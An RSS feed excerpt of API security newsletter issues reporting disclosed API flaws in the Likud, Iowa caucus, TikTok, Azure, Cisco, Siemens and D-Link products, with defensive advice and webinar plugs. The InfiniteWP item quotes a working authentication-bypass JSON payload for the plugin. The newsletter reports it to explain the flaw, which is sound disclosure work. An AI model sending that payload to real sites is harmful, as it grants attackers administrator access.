<p><a href="https://www.zdnet.com/article/netanyahus-party-exposes-data-on-over-6-4-million-israelis/" target="_blank" rel="noopener noreferrer">Ran Bar-Zik has discovered an API vulnerability in the app by Likud</a>, the ruling party of Israel. The app exposed the personal details of over 6 million Israeli voters:</p>
<ul>
<li>A link to an admin API endpoint was embedded in the source code of the app (<a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm" target="_blank" rel="noopener noreferrer">OWASP API5:2019</a>).</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6648" src="https://apisecurity.io/wp-content/uploads/2020/02/Likud-app-api-endpoint-in-code.jpg" alt="" width="587" height="249" /></p>
<ul>
<li>This endpoint was accessible <em>without</em> authentication (<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">OWASP API2:2019</a>).</li>
<li>The API response included the credentials of the site admins, including their passwords (<a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">OWASP API3:2019</a>), in cleartext (!)</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6649" src="https://apisecurity.io/wp-content/uploads/2020/02/Likud-app-admin-info-returned-by-api.jpg" alt="" width="776" height="750" /></p>
<p>This reads like a schoolbook <em>bad</em> example on what we have been highlighting:</p>
<ol>
<li>Never, ever, store or transport credentials in cleartext. In fact, passwords should never be stored at all &#8211; only their hashes.</li>
<li>Review your API designs. It is unlikely that any security specialist would ever approve creating an API for administrative credentials retrieval.</li>
<li>Always protect sensitive information and endpoints with authentication.</li>
<li>Don&#8217;t include sensitive information (like unprotected admin endpoints in this case, but also API keys, secrets, credentials) in your code.</li>
</ol>
<p>Unsurprisingly, these shortcomings provided easy access to the API backend and the database containing voter details. It is unclear if these details leaked before Bar-Zik uncovered the vulnerability, but the scope of the details makes the potential impact very serious.</p>
<p>The original story, in Hebrew, can be found <a href="https://internet-israel.com/%d7%97%d7%93%d7%a9%d7%95%d7%aa-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98/%d7%94%d7%9b%d7%a9%d7%9c%d7%99%d7%9d-%d7%a9%d7%94%d7%99%d7%95-%d7%91%d7%90%d7%a4%d7%9c%d7%99%d7%a7%d7%a6%d7%99%d7%aa-%d7%90%d7%9c%d7%a7%d7%98%d7%95%d7%a8/" target="_blank" rel="noopener noreferrer">here</a>.</p>
<h2>Vulnerability: Iowa caucus app</h2>
<p>Sadly, looks like API security really is not a strong suite with political parties: turns out that Iowa&#8217;s Democratic Presidential primary caucus app also leaves lot to be desired when it comes to API security.</p>
<p><a href="https://www.vice.com/en_us/article/3a8ajj/an-off-the-shelf-skeleton-project-experts-analyze-the-app-that-broke-iowa" target="_blank" rel="noopener noreferrer">Motherboard requested several researches to evaluate the caucus app</a>. One issue that a team of researchers from Stanford University found were the hard-coded API keys included, again, in the source code of the app. The team was able to decompile the app, get the keys, and access the API and its backend.</p>
<p>Source code cannot be considered a safe place to store secrets like credentials and API keys. Modern platforms have native secure storage that can be used. Application keys and secrets need to be combined with delegated authentication mechanism such as OAuth2 to generate temporary API keys for the actual API access.</p>
<h2>Webinar: Protecting microservices APIs with API Firewall</h2>
<p>On February 20, Isabelle Mauny from 42Crunch will be giving a webinar on API security for microservices in Kubernetes. The webinar &#8220;<a href="https://42crunch.com/webinar-kubernetes-api-firewall/" target="_blank" rel="noopener noreferrer">Protecting Microservices APIs with 42Crunch Kubernetes API Firewall</a>&#8221; will focus on, for example:</p>
<ul>
<li>North-South vs East-West protection</li>
<li>Firewalling individual microservices</li>
<li>Whitelisting based on API contracts following the OpenAPI Specification</li>
<li>CI/CD DevSecOps pipeline</li>
</ul>
<p>To register and secure your place, click <a href="https://42crunch.com/webinar-kubernetes-api-firewall/" target="_blank" rel="noopener noreferrer">here</a>.</p>
<h2>Video: Common API pitfalls</h2>
<p>The slides and the recording of Philippe De Ryck&#8217;s talk &#8220;Common API security pitfalls&#8221; from GOTO Chicago 2019 conference have been published.</p>
<p><iframe loading="lazy" title="Common API Security Pitfalls • Philippe De Ryck • GOTO 2019" width="640" height="360" src="https://www.youtube.com/embed/Ss1tZjooo9I?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>This session touches on lots of common issues, such as:</p>
<ul>
<li>Transport</li>
<li>Authentication</li>
<li>Authorization</li>
<li>JWT</li>
<li>Input validation</li>
<li>Tokens vs cookies</li>
<li>Keys and secrets</li>
<li>CSRF</li>
<li>XXS</li>
</ul>
<p>Slides available from Philippe&#8217;s site <a href="https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-70-vulnerabilities-in-twitter-and-party-apps-two-api-security-talks/">Issue 70: Vulnerabilities in Twitter, Likud, Iowa caucus apps, two API security talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 69: Vulnerabilities in Azure Stack and Cisco TelePresence, API fuzzing</title>
		<link>https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 06 Feb 2020 00:36:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6614</guid>

					<description><![CDATA[<p>This week, we look at the recently patched API vulnerabilities in Microsoft Azure Stack and  Azure Cloud infrastructure, and in Cisco TelePresence and RoomOS. In addition, there is a recorded conference talk on API pentesting, and Yelp has released an open-source tool for API fuzzing. Vulnerability: Azure Cloud infrastructure Ronen Shustin from Checkpoint Research has [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/">Issue 69: Vulnerabilities in Azure Stack and Cisco TelePresence, API fuzzing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look at the recently patched API vulnerabilities in Microsoft Azure Stack and  Azure Cloud infrastructure, and in Cisco TelePresence and RoomOS. In addition, there is a recorded conference talk on API pentesting, and Yelp has released an open-source tool for API fuzzing.</p>
<h2>Vulnerability: Azure Cloud infrastructure</h2>
<p>Ronen Shustin from Checkpoint Research has reported two API vulnerabilities in Azure Cloud infrastructure, and has written very detailed description on them. Microsoft has already fixed both vulnerabilities.</p>
<p><a href="https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-i/" target="_blank" rel="noopener noreferrer">The first vulnerability was found in Azure Stack</a>, Microsoft&#8217;s  on-premise Azure environment for enterprise use. Researchers used Azure Stack APIs to get the names, IDs, hardware info, and other information on the virtual machines in the cluster. Then they found a way to make another unauthenticated API call to get screenshots from live virtual machines belonging to other tenants.</p>
<p><a href="https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-ii/" target="_blank" rel="noopener noreferrer">The second vulnerability was found in Azure App Service</a>. One of its APIs lacked proper input validation before memory copy. This allowed the researchers to come up with a payload that gave them system admin rights.</p>
<p>API security is crucial to cloud services. If the API can access sensitive information that could open a door for further attacks, it must require authentication. And the importance of proper validation of input and output data cannot be stressed enough.</p>
<h2>Vulnerability: Cisco TelePresence and RoomOS</h2>
<p><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telepresence-path-tr-wdrnYEZZ" target="_blank" rel="noopener noreferrer">Cisco has fixed an API vulnerability</a> in their TelePresence and Webex Board, DX, and Room products.</p>
<p>Insufficient validation of user-supplied API parameters in a video endpoint API led to directory traversal vulnerability in Cisco TelePresence products and products using the RoomOS. If attackers had either an In-Room Control or administrator account, they could craft an API request that allowed them to read and write arbitrary files in the system.</p>
<p>Check out Cisco&#8217;s disclosure for full list of affected products and fixes product versions. We have covered previous issues in Cisco products in our newsletters <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener noreferrer">30</a>, <a href="https://apisecurity.io/issue-42-http-security-headers/" target="_blank" rel="noopener noreferrer">42</a>, <a href="https://apisecurity.io/issue-43-rest-api-security-testing/" target="_blank" rel="noopener noreferrer">43</a>, <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/" target="_blank" rel="noopener noreferrer">46</a>, <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/" target="_blank" rel="noopener noreferrer">47</a>, <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/" target="_blank" rel="noopener noreferrer">51</a>, <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/" target="_blank" rel="noopener noreferrer">55</a>, and <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/" target="_blank" rel="noopener noreferrer">65</a>.</p>
<h2>Video: API fuzzing and pentesting</h2>
<p>A recording of Frans Rosén&#8217;s keynote at BSides Ahmedabad is now available.</p>
<p>Rosén discusses the methodology of fuzzing and information disclosure: discovering API vulnerabilities through fuzzing, discovering endpoints or hidden backend microservices, bypassing internal security mechanisms, getting info from errors, forging JWT, and so forth.</p>
<p><iframe loading="lazy" title="Frans Rosén Keynote at BSides Ahmedabad" width="640" height="360" src="https://www.youtube.com/embed/rAuuN0OohJc?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>Not the best camerawork, but good content and excellent speaker, so still good to check out.</p>
<h2>Tools: Yelp Fuzz-Lightyear</h2>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken Object Level Authorization</a> (BOLA) tops the OWASP API Security Top 10 list. <a href="https://engineeringblog.yelp.com/2020/01/automated-idor-discovery-through-stateful-swagger-fuzzing.html" target="_blank" rel="noopener noreferrer">Yelp has released a new open source tool called fuzz-lightyear</a>.</p>
<p>This scanner helps locating BOLA (aka IDOR) vulnerabilities in your APIs. Because you can execute it from your CI/CD pipeline, it can potentially discover these at scale.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6629" src="https://apisecurity.io/wp-content/uploads/2020/02/Yelp-Fuzz-Lightyear-diagram.jpg" alt="" width="2496" height="1298" /></p>
<p>You can find the source code of the tool in this <a href="https://github.com/Yelp/fuzz-lightyear" target="_blank" rel="noopener noreferrer">GitHub repository</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/">Issue 69: Vulnerabilities in Azure Stack and Cisco TelePresence, API fuzzing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 68: API security in Gartner Hype Cycle, McAfee threat predictions for 2020</title>
		<link>https://apisecurity.io/issue-68-api-security-in-gartner-hype-cycle-threat-predictions-for-2020/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 29 Jan 2020 22:00:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6596</guid>

					<description><![CDATA[<p>This week, we take a look at where API security is at on Gartner Hype Cycle, what the threatscape for 2020 looks like to be according to McAfee, and a SANS Institute whitepaper on DevSecOps. Analysts: API security in Gartner Hype Cycle Gartner published their Hype Cycle for Application Security, 2019 a few months ago. The [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-68-api-security-in-gartner-hype-cycle-threat-predictions-for-2020/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-68-api-security-in-gartner-hype-cycle-threat-predictions-for-2020/">Issue 68: API security in Gartner Hype Cycle, McAfee threat predictions for 2020</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at where API security is at on Gartner Hype Cycle, what the threatscape for 2020 looks like to be according to McAfee, and a SANS Institute whitepaper on DevSecOps.</p>
<h2>Analysts: API security in Gartner Hype Cycle</h2>
<p><a href="https://www.gartner.com/en/documents/3953770/hype-cycle-for-application-security-2019" target="_blank" rel="noopener noreferrer">Gartner published their Hype Cycle for Application Security, 2019</a> a few months ago. The <a href="https://www.gartner.com/en/research/methodologies/gartner-hype-cycle" target="_blank" rel="noopener noreferrer">Hype Cycle</a>  provides a graph on where we are in application security in terms of the maturity of technologies and their adoption; what is up and coming and what is already established.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-6598" src="https://apisecurity.io/wp-content/uploads/2020/01/Gartner-Hype-Cycle-for-Application-Security-2019.jpg" alt="Gartner Hype Cycle for Application Security 2019" width="1214" height="926" /></p>
<p>The graphic shows that API security is very much a hot topic of the moment:</p>
<ul>
<li><strong>API Security Testing and Discovery</strong> is just starting to rise along the hype cycle. Companies are starting to use these tools to discover APIs that their development teams produce and  to test the security of these APIs during API design, implementation, and testing. This helps eliminate risks before they even get to production.</li>
<li><strong>API Threat Protection</strong> is approaching the peak of the expectations. These are tools with firewall capabilities for live API traffic. Unlike the generic web application firewall (WAF) category, these firewall products have been specifically designed to work with API traffic and protect your systems at runtime from API-specific attacks.</li>
</ul>
<p>For the definitions, position and adoption speed justification, user advice, business impact, vendor lists, and so forth, check out the full Gartner report.</p>
<h2>Opinions: Threat predictions for 2020</h2>
<p>January is the time of predictions for the year ahead. <a href="https://www.cisomag.com/threat-predictions-for-2020/" target="_blank" rel="noopener noreferrer">CISOMAG has published &#8220;5 Threat Predictions for 2020&#8221; by Raj Samani</a>, Chief Scientist and McAfee Fellow at McAfee. He predicts the following trends in cyber security:</p>
<ol>
<li>Broader deepfake capabilities will be available even for attackers with less skills.</li>
<li>Attackers will start generating deepfakes to bypass facial recognition.</li>
<li>Ransomware attacks will be executed as two-stage extortion campaigns.</li>
<li>DevSecOps will become more prominent as increased containerized workloads cause security controls to shift left.</li>
<li>APIs will be the weakest link in application security bringing about cloud-native threats.</li>
</ol>
<p>From the API security perspective, the last prediction is the most prominent one. However, DevSecOps is very topical as well, because containerized cloud architecture inevitably means even more APIs and API changes that can easily slip through controls to indeed become the weakest link in the chain&#8230;</p>
<h2>API security: OWASP API Security Top 10 explained</h2>
<p>Over at DevOps.com, Erez Yalon from the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 project</a> provides the details and sample exploit scenarios for each of the OWASP API Security Top 10 vulnerabilities.</p>
<p>Check out the two-part blog post:</p>
<ul>
<li><a href="https://devops.com/breaking-down-the-owasp-api-security-top-10-part-1/" target="_blank" rel="noopener noreferrer">Part 1</a></li>
<li><a href="https://devops.com/breaking-down-the-owasp-api-security-top-10-part-2/" target="_blank" rel="noopener noreferrer">Part 2</a></li>
</ul>
<h2>Whitepaper: DevSecOps</h2>
<p>Rebecca Deck from SANS institute has published a whitepaper titled &#8220;Adapting AppSec to a DevOps World&#8221;.</p>
<p>The whitepaper focuses on DevSecOps, the abuse cases and threat models affecting DevOps, and the challenges in trying to fit legacy tools into CI/CD pipeline.</p>
<p>To download the whitepaper, click <a href="https://www.sans.org/reading-room/whitepapers/application/paper/38305" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-68-api-security-in-gartner-hype-cycle-threat-predictions-for-2020/">Issue 68: API security in Gartner Hype Cycle, McAfee threat predictions for 2020</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 67: RFC for OAuth 2.0 Token Exchange, JWT Webinar</title>
		<link>https://apisecurity.io/issue-67-rfc-for-oauth-2-0-token-exchange-jwt-webinar/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 23 Jan 2020 00:18:14 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6582</guid>

					<description><![CDATA[<p>This week, the OAuth 2.0 Token Exchange got its RFC, and there is an upcoming webinar on JWT. In addition, we take a look at where to start with securing your APIs, and how does 2020 seem to be shaping up, according to analysts. Standard: OAuth 2.0 Token Exchange IETF has published the RFC 8693 [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-67-rfc-for-oauth-2-0-token-exchange-jwt-webinar/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-67-rfc-for-oauth-2-0-token-exchange-jwt-webinar/">Issue 67: RFC for OAuth 2.0 Token Exchange, JWT Webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, the OAuth 2.0 Token Exchange got its RFC, and there is an upcoming webinar on JWT. In addition, we take a look at where to start with securing your APIs, and how does 2020 seem to be shaping up, according to analysts.</p>
<h2>Standard: OAuth 2.0 Token Exchange</h2>
<p><a href="https://www.rfc-editor.org/rfc/rfc8693" target="_blank" rel="noopener noreferrer">IETF has published the RFC 8693 for OAuth 2.0 Token Exchange</a>.</p>
<p>This proposed standard documents a pattern that is already widely-deployed in production use. For example, such household names as Microsoft, RedHat, and Salesforce have already adopted this approach, to name but a few.</p>
<h2>Webinar: Are You Properly Using JWTs?</h2>
<p>Join the <a href="https://42crunch.com/webinar-jwt/" target="_blank" rel="noopener noreferrer">webinar by Philippe Leothaud on JWT security best practices</a> next Thursday, January 30, 2020 11:00 AM PST. This webinar will cover, for example:</p>
<ul>
<li>Typical scenarios where using JWT is a good idea</li>
<li>Typical scenarios where using JWT is a bad idea!</li>
<li>The principles of zero trust architecture and why you should always validate everything</li>
<li>Best practices to thoroughly validate JWTs and the potential vulnerabilities if you do not do so</li>
<li>Use cases for when encryption might be required for JWT</li>
</ul>
<p>Click <a href="https://42crunch.com/webinar-jwt/" target="_blank" rel="noopener noreferrer">here</a> to register and secure your place in the webinar. First come, first served!</p>
<h2>API security: 4 tips to keep your APIs safe</h2>
<p><a href="https://www.techrepublic.com/article/4-tips-to-help-keep-your-apis-safe/" target="_blank" rel="noopener noreferrer">Jonathan Greig from TechRepublic</a> has written a quick practical post on the first steps to keeping your APIs safe when they are increasingly the focus of attackers.</p>
<p>His four top tips for getting started with API Security:</p>
<ol>
<li>Authentication</li>
<li>Authorization</li>
<li>Security team setup</li>
<li>Third-party use</li>
</ol>
<p>Worth a read for anyone starting to looks at API security.</p>
<h2>Analysts: Aite on 2020 cyberthreats</h2>
<p>Aite Group has published <a href="https://www.aitegroup.com/report/top-10-trends-cybersecurity-2020-more-ransomware-evolving-strategies-and-new-tools" target="_blank" rel="noopener noreferrer">a report on the trends in cyber security in 2020</a>. Their  Top 10 list includes changes not only in technological solutions but also in business landscape and job market:</p>
<ol>
<li>The rise of the ransomware</li>
<li>Difficulties in filling cyber security positions</li>
<li>API security solutions</li>
<li>Cloud misconfigurations leaking data</li>
<li>SIEM and SOAR</li>
<li>Increased requirements data privacy and compliance</li>
<li>BAS solutions</li>
<li>Microsoft aggressive in the security market</li>
<li>Security analytics platforms replacing SIEM</li>
<li>Flat networks</li>
</ol>
<p>Recommended reading for anyone who wants to stay on top of the trends shaping the field.</p>
<p>The post <a href="https://apisecurity.io/issue-67-rfc-for-oauth-2-0-token-exchange-jwt-webinar/">Issue 67: RFC for OAuth 2.0 Token Exchange, JWT Webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 66: Vulnerabilities in TikTok and InfiniteWP Client, AppSecCali 2020</title>
		<link>https://apisecurity.io/issue-66-vulnerabilities-in-tiktok-and-infinitewp-client-appseccali-2020/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 16 Jan 2020 00:37:36 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6566</guid>

					<description><![CDATA[<p>This week, we check how several API vulnerabilities in TikTok can lead to attackers taking over the social media account, and how an admin plugin for WordPress had an API allowing for an authentication bypass. In other news, the OWASP security conference kicks off next week in California, and we take a look at API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-66-vulnerabilities-in-tiktok-and-infinitewp-client-appseccali-2020/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-66-vulnerabilities-in-tiktok-and-infinitewp-client-appseccali-2020/">Issue 66: Vulnerabilities in TikTok and InfiniteWP Client, AppSecCali 2020</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check how several API vulnerabilities in TikTok can lead to attackers taking over the social media account, and how an admin plugin for WordPress had an API allowing for an authentication bypass. In other news, the OWASP security conference kicks off next week in California, and we take a look at API security trends in 2020.</p>
<h2>Vulnerability: TikTok</h2>
<p><a href="https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/?" target="_blank" rel="noopener noreferrer">Check Point Research has unearthed a chilling list of API vulnerabilities in TikTok</a>, the highly popular social media app:</p>
<ul>
<li>An exposed API allowed SMS spoofing, so attackers could contact any user on TikTok behalf with links to their malicious site.</li>
<li>Insufficient regex validation allowed redirects to attacker URLs, in turn opening the door to further attacks, such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF).</li>
<li>No protection against CSRF allowed attackers to perform actions on user behalf, such as delete or add videos, make private videos public, access user profile information, and so forth.</li>
</ul>
<p>Check Point Research describes all the exploits in their brilliantly detailed post. The good news is that TikTok has fixed them.</p>
<h2>Vulnerability: InfiniteWP Client for WordPress</h2>
<p><a href="https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/" target="_blank" rel="noopener noreferrer">An API security vulnerability with authentication bypass was found in a popular InfiniteWP Client plugin</a>. The plugin is installed on more than 300 thousand sites, so the impact is significant.</p>
<p>The plugin provides remote WordPress management capabilities. Thus, there are client and server components communicating with each other via API.</p>
<p>Typical API use requires authentication. However, there is one scenario &#8211; new site creation &#8211; for which admin access is temporarily granted via a POST API call with the payload <code>{"iwp_action":"add_site","params":{"username":"admin"}}</code>.</p>
<p>Attackers can use this call to gain access and thus bypass authentication checks for other activities.</p>
<p>This vulnerability is another example why web application firewalls (WAFs) are not sufficient for API vulnerabilities. As Wordfence post admits, there is no way to tell malicious calls apart from legitimate ones, so a simple firewall rule is not enough to fix the issue. They had to release a new update with specific functionality that can differentiate between legitimate and malicious use by analyzing WordPress internal state.</p>
<h2>Conferences: AppSec California 2020</h2>
<p>One of the main OWASP events of the year, <a href="https://2020.appseccalifornia.org/" target="_blank" rel="noopener noreferrer">OWASP AppSec California 2020</a>, takes place next week, Jan 21-24, in Santa Monica, CA.</p>
<p>This is a great cybersecurity conference in general, and the program includes some API security sessions including:</p>
<ul>
<li>Building Secure API&#8217;s and Web Applications by Jim Manico</li>
<li>Attacking and Defending Containerized Apps and Serverless Tech by Tilak Thimmappa and Nithin Jois</li>
<li>DevSecOps enabled micro-perimeter API protection by Lukasz Radosz</li>
<li>OAuth 2.0 Misimplementation, Vulnerabilities and Best Practices by Pak Foley</li>
<li>Achieve AI-powered API Privacy using Open Source by Gianluca Brigandi</li>
<li>JWT Parkour by Louis Nyffenegger</li>
<li>Are You Properly Using JWTs? by Dmitry Sotnikov</li>
</ul>
<p>Registration is still open, so if you are around and interested, highly recommended.</p>
<h2>Opinion: API security in 2020</h2>
<p><a href="https://businessinsights.bitdefender.com/api-security-a-top-concern-for-cybersecurity-in-2020" target="_blank" rel="noopener noreferrer">Ericka Chickowski</a> joins the choir of experts hailing API security as a top concern for cybersecurity in 2020.</p>
<p>In her write-up, Chickowski compiles the latest stats and trends related to API spread &amp; API security, and also talks about the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 project</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-66-vulnerabilities-in-tiktok-and-infinitewp-client-appseccali-2020/">Issue 66: Vulnerabilities in TikTok and InfiniteWP Client, AppSecCali 2020</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 65: Vulnerabilities at Siemens, Cisco, D-Link, OWASP API Security Top 10 2019 out</title>
		<link>https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 08 Jan 2020 22:00:09 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6549</guid>

					<description><![CDATA[<p>This week, we look into the recent API vulnerabilities in Siemens plant operation control system, D-Link routers, and Cisco network management. In addition, OWASP has formally released their first-ever Top 10 list of API security. Vulnerability: Siemens SPPA-T3000 The application server of the Siemens plant operation control system SPPA-T3000 had API vulnerabilities. The AdminService API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/">Issue 65: Vulnerabilities at Siemens, Cisco, D-Link, OWASP API Security Top 10 2019 out</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into the recent API vulnerabilities in Siemens plant operation control system, D-Link routers, and Cisco network management. In addition, OWASP has formally released their first-ever Top 10 list of API security.</p>
<h2>Vulnerability: Siemens SPPA-T3000</h2>
<p>The application server of the <a href="https://cert-portal.siemens.com/productcert/pdf/ssa-451445.pdf" target="_blank" rel="noopener noreferrer">Siemens plant operation control system SPPA-T3000 had API vulnerabilities</a>. The AdminService API was accessible without authentication as long as you had network access to it and knew how to craft requests for it.</p>
<p>This is a clear example of <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">OWASP API2:2019 — Broken authentication</a>. The vulnerabilities could allow an attacker to execute arbitrary code on the server, perform a Denial-of-Service (DoS) attack on the server communications, or even access sensitive information and user passwords.</p>
<p>Siemens has published a detailed report on all the discovered vulnerabilities as well as how to mitigate them. They have also highlighted that all vulnerabilities require a network access to specific components that, if the system has been correctly set up as they recommend,  should not be accessible.</p>
<p>API security must be set up in layers. These days, when controlling the network edge is becoming increasingly challenging, you can no longer rely on your internal network being impregnable. Rogue actors can be company insiders or attackers can find a way in to your network on their own. API authentication and authorization must be there to protect API functions in these scenarios.</p>
<h2>Vulnerability: D-Link</h2>
<p>Miguel Mendez Z. and Pablo Pollanco have found <a href="https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104" target="_blank" rel="noopener noreferrer">a vulnerability in the UPnP API of D-Link DIR-859 routers</a>. This vulnerability allows attackers to inject malicious code for the router to perform.</p>
<p>In their detailed post, Mendez and Pollanco demonstrate how this allowed them to get and maintain access to the router. They also helpfully list all the affected router models and when fixes should be available.</p>
<p>This is an example of <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm">OWASP API8:2019 — Injection</a>. To prevent such attacks, always strictly define the payloads and parameters that your APIs expect (schemas, regular expressions for strings, and so forth) and enforce your definitions.</p>
<h2>Vulnerability: Cisco</h2>
<p>Steven Seeley has found ore than 120 vulnerabilities in Cisco Data Center Network Manager (DCNM) and its APIs. Among these were also three critical issues, with CVSS score of 9.8, more or less as bad as it gets.</p>
<p>For example, static key shared between installations was used for encryption, allowing attackers to forge access tokens and perform admin calls. In addition, the web-based management interface had hard-coded credentials.</p>
<p>It cannot be stressed too much: <em>never</em>, <em>ever</em>, use hardcoded credentials. Static keys for token encryption and signing is also a bad idea, because if your access tokens can be forged, they are not really protecting the APIs, and instead just give you a false sense of security.</p>
